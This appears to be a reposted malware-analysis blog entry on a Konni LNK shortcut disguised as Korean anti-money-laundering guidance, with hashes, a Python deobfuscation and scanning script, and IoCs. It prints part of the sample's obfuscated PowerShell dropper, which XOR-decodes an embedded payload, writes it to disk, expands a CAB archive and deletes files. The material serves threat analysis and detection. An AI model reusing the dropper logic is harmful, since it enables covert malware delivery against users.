lazarusholic


Malware made by the North Korean hacking group Konni: "Virtual Asset Service Provider Anti-Money Laundering Supervision Direction (2025.2.18)"

2025-02-24, Sakai
https://wezard4u.tistory.com/429413
#Konni #LNK

Contents

Today we will look at the malware made by the North Korean hacking group Konni, "Virtual Asset Service Provider Anti-Money Laundering Supervision Direction (2025.2.18)".
File name: 가상자산사업자 자금세탁방지 감독 방향.lnk (Virtual Asset Service Provider Anti-Money Laundering Supervision Direction.lnk)
Size: 2 MB
MD5: c09d17e968b250cadd66ec000d656d19
SHA-1: 11f11d2ae39a35e433fe9c8f1b6a79798c447bc7
SHA-256: 4a6c23e76524364fe9b9f5ecd46dc73e7714cac93849a380f0d1b746fae3650d
As with the classic approach, the sample is disguised as an ordinary LNK (shortcut) file, but its distinguishing feature is that the malware actually carries embedded PowerShell code.
PowerShell code contained in the malware:
StringData
{
namestring: hwp File
relativepath: not present
workingdir: not present
commandlinearguments:
/c for /f "tokens=*" %f in ('dir /s /b %system(r)oot%\System32\WindowsPowershell\*(.)exe ^
| findstr /i rshell.exe') do (if exist "%f" (%f "function position{param($business);
<#moment arrange#>$seve(n)th = $business.substring(0,$busin(e)ss.length-4) + ''; <#pl
iable green#>return $seventh;};function cunning{param($leaf);<#rigid vari(o)us#> re''
mov''e-''i''tem <#chase tapeworm#> -path $leaf <#sufficient parade#> -force;};function
feast{param($combining,$assurance,$emp(l)oy,$boat,$desire);<#homage plaintiff#> $open
ing=Ne''w''-O''bje''ct System.IO.FileStream(<#response coalesce#>$combining,<#runn(i)
n(g) hospital#>[System.IO.FileMode]::Open,<#grain species#>[System.IO.FileAccess]::Re
ad);<#fire belong#> $openin(g).Seek(<#learned enhance#>$assurance,[System.IO.SeekOrig
in]::Begin);<#calling rendering#> $ordinary=$employ*0(x)01;<#distinctly convict#> $wo
od=New''-''Obj''ec''t byte[] <#infinite proboscis#>$employ; <#assurance tube#> $rovin
g=N''e''w-O''b''je''ct b(y)te[] <#press crystalline#>$ordinary; <#twenty execution#>$
opening.Read(<#pertaining outer#>$roving,0,<#length defect#>$ordinary); $opening.Clos
(e)();$atlantic=0;while($atlantic -lt $employ){<#varieties reveal#>$wood[$atlantic]=$rovi
ng[$atlantic*0x01] -bxor $boat;$atlantic++;}<#maiden revolut(i)on#> se''t''-''con''ten''t
$desire <#flame neither#> $wood -Encoding <#assault collar#> Byte;};function protection{p
aram($interval, $hawk);<#f(l)ank flux#> expand $interval <#humanity accuracy#> -F:* $hawk
;};function literature{$contracted = $env:public<#student defeat#> + '\' +<#ha(r)dness re
ckless#> 'doc'+'um'+'ent'+'s';<#whip foliated#> return $contracted;};function cheer{param
($utmost); <#exclusive truck#>$pe(e)vish …
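As an added example (my own code, not from the original post), a small Python normaliser that undoes the two obfuscation tricks visible in the command line above, the <# #> comment stuffing and the '' quote-splitting of cmdlet names, and then flags the behaviours an analyst would look for. The sample string is constructed from fragments of the dump above; the indicator descriptions are my own and not from the post.

```python
import re

# Constructed sample modelled on fragments of the LNK command line shown above.
SAMPLE = (
    "function cunning{param($leaf);<#rigid various#> re''mov''e-''i''tem "
    "<#chase tapeworm#> -path $leaf <#sufficient parade#> -force;};"
    "$opening=Ne''w''-O''bje''ct System.IO.FileStream(<#response coalesce#>$combining,"
    "[System.IO.FileMode]::Open);"
    "$wood[$atlantic]=$roving[$atlantic*0x01] -bxor $boat;"
    "se''t''-''con''ten''t $desire <#flame neither#> $wood -Encoding Byte;"
    "$contracted = $env:public + '\\' + 'doc'+'um'+'ent'+'s';"
)

# Behaviours an analyst would flag once the text is normalised (my own labels,
# describing what the dropper functions on this page do; not vendor signatures).
INDICATORS = {
    "remove-item": "deletes files (self-cleanup)",
    "-bxor": "XOR-decodes an embedded payload",
    "set-content": "writes raw bytes to disk",
    "new-object system.io.filestream": "reads bytes at an offset (payload carving)",
    "expand ": "unpacks a CAB archive",
}


def deobfuscate(cmd: str) -> str:
    """Strip <# #> comments, join 'a'+'b' literals, remove '' splits, squeeze spaces."""
    cmd = re.sub(r"<#.*?#>", " ", cmd, flags=re.S)        # comment stuffing
    while True:                                           # 'doc'+'um'+... -> 'documents'
        joined = re.sub(r"'([^']*)'\s*\+\s*'([^']*)'", r"'\1\2'", cmd)
        if joined == cmd:
            break
        cmd = joined
    # '' inside a token is a no-op in PowerShell; dropping it rejoins re''mov''e -> remove.
    # (A genuine escaped quote 'it''s' would also be collapsed; acceptable for triage.)
    cmd = cmd.replace("''", "")
    return re.sub(r"\s+", " ", cmd).strip()


def scan(cmd: str) -> dict:
    """Normalise a command line and report which indicators it contains."""
    normalised = deobfuscate(cmd).lower()
    hits = {k: v for k, v in INDICATORS.items() if k in normalised}
    return {"normalised": normalised, "hits": hits, "score": len(hits)}


if __name__ == "__main__":
    result = scan(SAMPLE)
    print(result["normalised"])
    for key, meaning in result["hits"].items():
        print(f"[{key}] {meaning}")
```

Running it on the constructed sample reveals remove-item, New-Object System.IO.FileStream, -bxor and set-content once the noise is removed, which is what the function bodies in the dump above actually do.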

IoC

c09d17e968b250cadd66ec000d656d19
4a6c23e76524364fe9b9f5ecd46dc73e7714cac93849a380f0d1b746fae3650d
11f11d2ae39a35e433fe9c8f1b6a79798c447bc7